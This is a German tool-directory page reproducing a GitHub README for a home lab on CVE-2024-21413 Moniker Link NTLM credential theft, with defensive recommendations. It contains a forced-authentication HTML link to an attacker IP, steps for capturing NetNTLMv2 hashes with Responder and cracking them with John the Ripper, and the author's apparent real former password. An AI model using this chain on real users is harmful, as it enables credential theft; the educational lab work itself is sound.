Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Moniker-Link-Lab-Setup — Penetrationstest-Labor zur Demonstration der Moniker-Link-Ausnutzung von CVE-2024-21413 für den Diebstahl von NTLM-Anmeldeinformationen, einschließlich Angriffsausführung, Hash-Cracking und defensiver Gegenmaßnahmen. | Kitploit
Tools/GitHubGitHub/e-m-e-k-a/moniker-link-lab-setup
Passwort-CrackingSchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsSocial EngineeringAuthentifizierungLernen & BildungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHube-m-e-k-a/moniker-link-lab-setup

Moniker-Link-Lab-Setup

Penetrationstest-Labor zur Demonstration der Moniker-Link-Ausnutzung von CVE-2024-21413 für den Diebstahl von NTLM-Anmeldeinformationen, einschließlich Angriffsausführung, Hash-Cracking und defensiver Gegenmaßnahmen.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Moniker Link Lab-Einrichtung - CVE-2024-21413

🎯 Projektübersicht

Praxisorientiertes Penetration-Testing-Labor, das die Ausnutzung von Moniker Links (CVE-2024-21413) zur NTLM-Anmeldeinformationsgewinnung demonstriert. Dieses Projekt dokumentiert die vollständige Angriffskette von der Einrichtung bis zur Kompromittierung von Anmeldeinformationen, einschließlich realer Herausforderungen und Lösungen.

Wichtigste Errungenschaft: Der Moniker-Link-Angriff wurde sowohl in einer isolierten Laborumgebung (Windows-10-VM) als auch auf einem realen System (Windows-11-PC) erfolgreich ausgeführt, was praktische Sicherheitslücken und defensive Gegenmaßnahmen demonstriert.


🏗️ Laborarchitektur

Infrastruktur

Angriffsmaschine:

  • Plattform: Kali Linux 2024
  • Netzwerk (Host-Only): 192.168.56.101
  • Netzwerk (Bridged): 192.168.1.117
  • Primäres Werkzeug: Responder 3.1.6.0

Zielsysteme:

  • Windows 10 VM: 192.168.56.104 (Isolierte Testumgebung)
  • Windows 11 PC: 192.168.1.178 (Validierung in realer Umgebung)

Netzwerkkonfiguration:

  • VirtualBox-Host-Only-Adapter (VM-Tests)
  • VirtualBox-Bridge-Adapter (Tests mit echtem PC)
  • Isoliert von Produktionsnetzwerken

⚔️ Angriffsausführung

Angriffsablauf

  1. Responder auf Kali bereitstellen, um auf NTLM-Authentifizierung zu lauschen
  2. Bösartigen Link erstellen mithilfe des file://-Protokolls, der auf die IP des Angreifers zeigt
  3. Authentifizierung auslösen über einen UNC-Pfad im Datei-Explorer
  4. NetNTLMv2-Hash erfassen, wenn das Opfer eine Verbindung versucht
  5. Passwort knacken mit John the Ripper

Einfacher Angriffsvektor

HTML-Datei (test.html):

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
    <p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>

Datei-Explorer-Methode:

  • Benutzer gibt \\192.168.56.101\test in die Adressleiste ein
  • Windows versucht eine SMB-Verbindung
  • NTLM-Hash wird automatisch gesendet (oder Aufforderung zur Eingabe von Anmeldeinformationen)
  • Responder erfasst die Authentifizierung

🚧 Herausforderungen & Lösungen

Herausforderung 1: Windows-Firewall blockiert Verbindungen (Windows 11 PC)

Problem:

  • Windows-11-PC konnte von Kali aus nicht angepingt werden
  • SMB-Verbindungsversuche schlugen fehl
  • Angriff vollständig blockiert

Ursache:

  • Windows-Firewall standardmäßig aktiviert
  • Blockiert eingehende SMB-Verbindungen von externen IPs

Lösung:

  • Windows-Firewall für Tests vorübergehend deaktiviert
  • Verbindung sofort erfolgreich
  • Hash erfolgreich erfasst

Lehre: Die standardmäßige Windows-Firewall bietet effektiven Schutz gegen diesen Angriff. Benutzer müssen sie aktiviert lassen.


Herausforderung 2: Zwischengespeicherte Ergebnisse in John the Ripper (Windows 10 VM)

Problem:

  • Ursprüngliches Windows-10-Passwort: nwigwecj1
  • John zeigte: 12Honey (falsches Passwort!)
  • 12Honey stammte aus einem früheren Test

Ursache:

  • John speichert geknackte Passwörter in ~/.john/john.pot
  • Alter Hash aus früherer Sitzung
  • Zeigte zwischengespeichertes Ergebnis statt des aktuellen Passworts

Lösung:

  • Windows-10-VM-Passwort auf 1414 geändert
  • Neuen Hash erfasst
  • Benutzerdefinierte Wortliste mit wahrscheinlichen Passwörtern erstellt
  • Mit neuer Wortliste erfolgreich geknackt

Lehre: Immer überprüfen, dass man den richtigen Hash knackt. Pot-Datei löschen oder eindeutige Passwörter für Tests verwenden.


Herausforderung 3: Passwort nicht in rockyou.txt

Problem:

  • Passwort 1414 in rockyou.txt nicht gefunden (14 Millionen Passwörter)
  • Generischer Wortlistenangriff schlug fehl

Ursache:

  • rockyou.txt enthält nicht jede mögliche 4-stellige Kombination
  • Einfache numerische Sequenzen fehlen oft in gängigen Wortlisten

Lösung:

  • Gezielte benutzerdefinierte Wortliste basierend auf gängigen Mustern erstellt:
root@kitploit:~
  echo "1414" > passwords.txt
  echo "4141" >> passwords.txt
  • Mit benutzerdefinierter Wortliste sofort geknackt

Lehre: „Nicht in rockyou.txt" ≠ sicher. Kurze Passwörter sind anfällig für gezielte Angriffe und Brute-Force-Angriffe, unabhängig vom Vorhandensein in Wortlisten.


📊 Ergebnisse

Windows 10 VM (kontrollierte Umgebung)


Windows 11 PC (reales System)


🛡️ Sicherheitsanalyse

Was funktioniert hat (Verteidigung)

✅ Windows-Firewall - Hat den Angriff bei Aktivierung vollständig blockiert ✅ Moderne Browser - Chrome/Edge blockieren Remote-file://-Links ✅ Benutzerbewusstsein - Manuelle Aufforderung erfordert eine Benutzeraktion

Was versagt hat (Schwachstellen)

❌ Schwache Passwörter - 4-stellige Ziffern leicht zu knacken ❌ Deaktivierte Firewall - Häufiger Benutzerfehler ❌ Datei-Explorer - Keine Warnung vor UNC-Pfaden ❌ NTLM-Protokoll - Automatische Authentifizierung gegenüber SMB-Freigaben

Wichtigste Erkenntnisse

1. Firewall ist entscheidend

  • Die standardmäßige Windows-Firewall blockiert diesen Angriff
  • ~30–40 % der Benutzer deaktivieren sie dauerhaft
  • Unternehmensnetzwerke erlauben oft internes SMB

2. Illusion der Passwortstärke

  • 1414 nicht in rockyou.txt (erscheint „stark")
  • Mit gezielter Wortliste sofort geknackt
  • Kurze Passwörter bieten keinerlei Sicherheit

3. Benutzerinteraktion erforderlich

  • Moderne Sicherheit erfordert, dass der Benutzer den UNC-Pfad einfügt
  • Social Engineering bleibt eine entscheidende Komponente
  • Technischer Exploit allein reicht nicht aus

🔧 Verwendete Werkzeuge

Offensiv:

  • Responder 3.1.6.0 (NTLM-Hash-Erfassung)
  • John the Ripper (Passwortknacken)
  • Erstellung benutzerdefinierter Wortlisten
  • Einfache HTML-Datei

Infrastruktur:

  • VirtualBox 7.0 (Virtualisierung)
  • Kali Linux 2024 (Angriffsplattform)
  • Windows 10 Enterprise (Testziel)
  • Windows 11 Pro (Validierung in realer Umgebung)

📁 Repository-Struktur

root@kitploit:~
Moniker-Link-Lab-Setup/
├── README.md (this file)
├── Documentation/
│   ├── attack-execution.md (step-by-step attack guide)
│   └── README.md (documentation overview)
├── Screenshots/ (attack screenshots - to be added)
└── Scripts/ (HTML test file - to be added)

🎓 Demonstrierte Fähigkeiten

Technisch:

  • Netzwerkprotokollanalyse (SMB, NTLM)
  • Penetration-Testing-Methodik
  • Passwortknack-Techniken
  • Virtuelle Laborinfrastruktur
  • Firewall-Fehlerbehebung

Beruflich:

  • Technische Dokumentation
  • Problemlösung unter Einschränkungen
  • Sicherheitsbewertung
  • Risikoanalyse
  • Ethische Testpraktiken

🔒 Defensive Empfehlungen

Für Benutzer

  • ✅ Windows-Firewall aktiviert lassen
  • ✅ Niemals UNC-Pfade aus E-Mails einfügen
  • ✅ Starke Passwörter verwenden (15+ Zeichen)
  • ✅ Absender überprüfen, bevor auf Dateifreigaben zugegriffen wird

Für Organisationen

  • ✅ Ausgehendes SMB (Port 445) an der Netzwerk-Firewall blockieren
  • ✅ NTLM deaktivieren, Kerberos durchsetzen
  • ✅ SMB-Verbindungen zu externen IPs überwachen
  • ✅ E-Mail-Gateway-Filterung (file://-Links entfernen)
  • ✅ Schulungen zum Sicherheitsbewusstsein
  • ✅ Richtlinien für Passwortkomplexität

⚠️ Ethische Offenlegung

Alle Tests wurden an autorisierten Systemen durchgeführt:

  • Nur persönliche Laborinfrastruktur
  • Isolierte virtuelle Netzwerke
  • Eigene Geräte und Konten
  • Bildungszweck

Rechtlicher Hinweis: Unbefugter Computerzugriff ist illegal. Dieses Projekt dient nur Bildungszwecken und autorisierten Testumgebungen.


📚 Referenzen

  • CVE-2024-21413 - Microsoft-Sicherheitshinweis
  • MITRE ATT&CK - Forced Authentication (T1187)
  • TryHackMe - Moniker Link Room

📞 Kontakt

LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ GitHub: @E-m-e-k-a

Datum: März 2026


📄 Lizenz

Nur für Bildungszwecke. Nicht für unbefugte Tests.


⭐ Wenn Ihnen dieses Projekt geholfen hat, erwägen Sie bitte, dem Repository einen Stern zu geben!

Tool herunterladen
MetrikErgebnis
Ursprüngliches Passwortnwigwecj1
Geändert auf1414
WortlisteBenutzerdefiniert (2 Einträge)
Knackzeit< 1 Sekunde
FirewallFür Tests deaktiviert
Status✅ Erfolgreich kompromittiert
MetrikErgebnis
Passwort1414
FirewallAnfangs blockiert, dann deaktiviert
AuthentifizierungManuelle Aufforderung (Anmeldeinformationen eingegeben)
KnackzeitSofort
Status✅ Erfolgreich kompromittiert